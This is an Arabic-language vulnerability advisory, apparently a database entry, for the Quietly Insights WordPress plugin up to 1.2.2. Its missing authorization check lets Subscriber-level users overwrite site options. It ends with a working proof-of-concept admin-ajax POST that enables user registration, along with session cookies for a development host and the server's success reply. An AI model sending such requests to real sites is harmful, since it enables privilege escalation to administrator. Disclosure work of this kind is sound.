
Quietly Insights <= 1.2.2 - عدم وجود تصريح يسمح للمستخدمين المصادق عليهم (مشترك+) بتحديث خيارات عشوائية
Quietly Insights <= 1.2.2 - غياب التفويض للمستخدمين الموثقين (Subscriber+) يؤدي إلى تحديث خيارات عشوائية
إضافة Quietly Insights لـ WordPress معرضة لتعديل غير مصرح به للبيانات يمكن أن يؤدي إلى تصعيد الامتيازات بسبب عدم وجود فحص للقدرات على دالة في جميع الإصدارات حتى 1.2.2. وهذا يجعل من الممكن للمهاجمين الموثقين، بمستوى وصول Subscriber فما فوق، تحديث خيارات عشوائية على موقع WordPress. يمكن استغلال ذلك لتحديث الدور الافتراضي للتسجيل إلى مسؤول وتمكين تسجيل المستخدمين للمهاجمين لكسب وصول مستخدم إداري إلى موقع ضعيف.
قم بتغيير الكوكيز إلى كوكيزك.
POST /wp-admin/admin-ajax.php HTTP/2
Host: wp-dev.ddev.site
Content-Type: application/x-www-form-urlencoded
Content-Length: 56
Cookie: wordpress_sec_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C31038bfa66d0777c50fba66263f613d288a20d1e14dfc0fc06903f77d1c9e41f; popup_time=2; alwaysStrip=1; _ga=GA1.2.1953252658.1732269795; _ga_16PD6PV48S=GS1.2.1732269795.1.0.1732270283.0.0.0; wp-settings-time-1=1734520301; wp-settings-1=libraryContent%3Dbrowse; wordpress_test_cookie=WP%20Cookie%20check; wordpress_logged_in_738b26438442006baf5dc1367e0c0fd7=superadmin%7C1734790221%7CenzNuyQN6cnP5g8Bmw6ZVil29WJCzcIc1bx3Z10l32r%7C987ff9134b881efe3cced2fa12593fd0ba5b2b02613fb93f48433b112015551a; PHPSESSID=49f0a4bfb294cad31ed4a83ede9bf485; tk_ai=zv7IX5yQT%2F6RzXuKQwqmMvEV; th_shop_mania_thms_time=1735227350366; tk_qs=
action=save_qap_id&option=users_can_register&new_value=1
{"option was":"users_can_register","value was":"1","success":true,"message":"Database updated successfully."}